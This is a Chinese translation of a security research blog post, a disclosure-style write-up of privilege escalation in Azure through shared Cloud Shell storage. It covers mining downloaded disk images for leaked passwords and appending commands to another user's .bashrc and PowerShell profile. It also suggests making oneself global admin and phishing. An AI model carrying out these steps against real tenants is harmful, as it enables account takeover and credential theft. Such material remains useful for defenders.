通過Cloud Shell進(jìn)行Azure提權(quán)

時間：2023-06-30 13:21:01 | 來源：網(wǎng)站運(yùn)營

時間：2023-06-30 13:21:01 來源：網(wǎng)站運(yùn)營

通過Cloud Shell進(jìn)行Azure提權(quán)：

前言

默認(rèn)情況下，Azure訂閱貢獻(xiàn)者可以訪問訂閱中所有的存儲帳戶。而這些存儲帳戶包含Azure Cloud Shell存儲文件（Linux的home目錄），其中可能存在敏感信息。通過修改這些Cloud Shell文件，攻擊者可以在其他用戶的Cloud Shell會話中執(zhí)行惡意命令，導(dǎo)致跨帳戶的命令執(zhí)行和權(quán)限提權(quán)。

介紹

Azure Cloud Shell（Bash或PowerShell）是一種管理Azure資源的便捷方法，但也是滲透測試中敏感數(shù)據(jù)泄露和權(quán)限提升的潛在“因素”。Azure Cloud Shell可幫助用戶從“任何地方”管理Azure中的資源，這其中涉及shell.azure.com、Azure移動應(yīng)用，以及微軟的終端應(yīng)用。


為了在任何時間和任何地點都保持一致的體驗，Cloud Shell服務(wù)會將文件保存在你訂閱的Azure存儲帳戶中。同時Cloud Shell也將和你選擇的存儲帳戶相關(guān)聯(lián)，實際文件位于該存儲帳戶的文件共享服務(wù)之中。如果你使用的存儲帳戶是由Cloud Shell默認(rèn)自動生成的，那么它的前綴很可能是“cs”。


有關(guān)Azure Cloud Shell的更多信息，請查閱此文檔（https://docs.microsoft.com/zh-cn/azure/cloud-shell/persisting-shell-storage）

如何處理Cloud Shell文件？

假設(shè)我們現(xiàn)在已掌控了一個他人的AzureAD帳戶，有權(quán)對共享的Cloud Shell文件進(jìn)行讀寫，通常我們也是訂閱中的貢獻(xiàn)者帳戶。

重要提示:默認(rèn)情況下，所有訂閱貢獻(xiàn)者帳戶將對所有訂閱存儲帳戶具有讀/寫訪問權(quán)限，除非另有限制。此時你應(yīng)該能夠下載Cloud Shell目錄中的任何可用文件，包括acc_ACCT.img文件。如果同一存儲帳戶存在多個具有Cloud Shell實例的用戶，則存儲帳戶中將有多個文件夾。作為攻擊者，選擇要攻擊的帳戶（john）并下載該帳戶下的IMG文件。這個文件通常有5GB大小，可能需要下載一分鐘。


這個IMG文件是一個EXT2文件系統(tǒng)，可以輕松地將文件系統(tǒng)掛載到Linux機(jī)器上。一旦成功掛載到你的Linux機(jī)器上，我們就開始著重關(guān)注兩點。

信息泄漏

如果Cloud Shell已用于進(jìn)行任何實際的操作（而不是偶然打開一次），那么操作該Shell的用戶很可能在輸入命令時犯了一些錯誤。如果這些錯誤確實在Azure PowerShell命令行上運(yùn)行過，那么產(chǎn)生的錯誤日志將最終出現(xiàn)在IMG文件系統(tǒng)中的.Azure文件夾中。

新Az虛擬機(jī)的命令行操作特別容易受到上述漏洞的影響，因為新虛擬機(jī)本地管理員帳戶的憑據(jù)可能會被記錄下來。在本例中，我們嘗試創(chuàng)建一個名稱不兼容的VM。這就產(chǎn)生了一個錯誤，導(dǎo)致了密碼被記錄下來。

PS Azure:/> grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log103341- }103349-},103356-"osProfile": {103375- "computerName": "asdfghjkllkjhgfdasqweryuioasdgkjalsdfjksasdf",103445- "adminUsername": "netspi",103478: "adminPassword": "Cleartext?",103515- "windowsConfiguration": {}103548-},103555-"networkProfile": {103579- "networkInterfaces": [103608-{如果對Cloud Shell的IMG文件進(jìn)行解析，或許可在.Azure/ErrorRecords文件中找到很多敏感信息。

此外，其他一些命令歷史文件可能也有驚喜：

.bash_history.local/share/powershell/PSReadLine/ConsoleHost_history.txt

跨賬戶命令執(zhí)行

假設(shè)你攻陷了Azure訂閱中的“Bob”帳戶。他是訂閱中的貢獻(xiàn)者帳戶，且與“Alice”共享訂閱。而Alice是訂閱的所有者，也是Azure tenant的全局管理員。Alice還是一個Cloud Shell高級用戶，在Bob相關(guān)的訂閱中有一個實例。


因為Bob是訂閱的貢獻(xiàn)者，因此他有權(quán)（默認(rèn)情況下）下載任何Cloud Shell中的.IMG文件，包括Alice的acc_Alice.IMG。下載后，Bob將IMG文件裝載到Linux系統(tǒng)（mount acc_alice.IMG/mnt/）中，并將需要運(yùn)行的惡意命令附加到以下兩個文件中：

.bashrc./home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1作為演示，我們嘗試把MicroBurst下載到Cloud Shell：

$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> .bashrc$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1一旦完成，就卸載IMG，并將其上傳回Azure存儲帳戶中。當(dāng)你上載時，請確保選擇“覆蓋已存在的文件”。

上傳完成后，Cloud Shell就已經(jīng)準(zhǔn)備好攻擊了。當(dāng)Alice啟動的下一個Cloud Shell實例時，針對Alice帳戶的攻擊就會開始。

而在Azure Linux虛擬機(jī)中掛載共享文件可能會實現(xiàn)相同的效果。

Example

假設(shè)我們剛剛做好了攻擊準(zhǔn)備，在Cloud Shell啟動時會輸出“Hello World”（也是通過修改.bashrc和PowerShell配置文件來實現(xiàn)）。無論哪種Cloud Shell（Bash和PowerShell），我們的惡意命令都會運(yùn)行。













可供你進(jìn)行攻擊的命令有很多，但我還是建議使用提權(quán)命令，將當(dāng)前用戶也設(shè)置為Azure tenant的全局管理員。

如果不確定目標(biāo)可以訪問哪些訂閱，可以查看Cloud Shell目錄中的.azure/azureProfile.json文件。

最后，如果你的目標(biāo)遲遲沒有使用Cloud Shell，那么一封特制的釣魚郵件是個好選擇。





這兩個漏洞與2019年10月21日進(jìn)行上報，經(jīng)過一段時間的積極交流，微軟于12月4日關(guān)閉了報告。

本文由白帽匯整理并翻譯，不代表白帽匯任何觀點和立場來源：https://blog.netspi.com/attacking-azure-cloud-shell/本文由白帽匯整理并翻譯，不代表白帽匯任何觀點和立場

來源：通過Cloud Shell進(jìn)行Azure提權(quán)

原文：https://blog.netspi.com/attacking-azure-cloud-shell/

白帽匯從事信息安全，專注于安全大數(shù)據(jù)、企業(yè)威脅情報。

公司產(chǎn)品：FOFA-網(wǎng)絡(luò)空間安全搜索引擎、FOEYE-網(wǎng)絡(luò)空間檢索系統(tǒng)、NOSEC-安全訊息平臺。

為您提供：網(wǎng)絡(luò)空間測繪、企業(yè)資產(chǎn)收集、企業(yè)威脅情報、應(yīng)急響應(yīng)服務(wù)。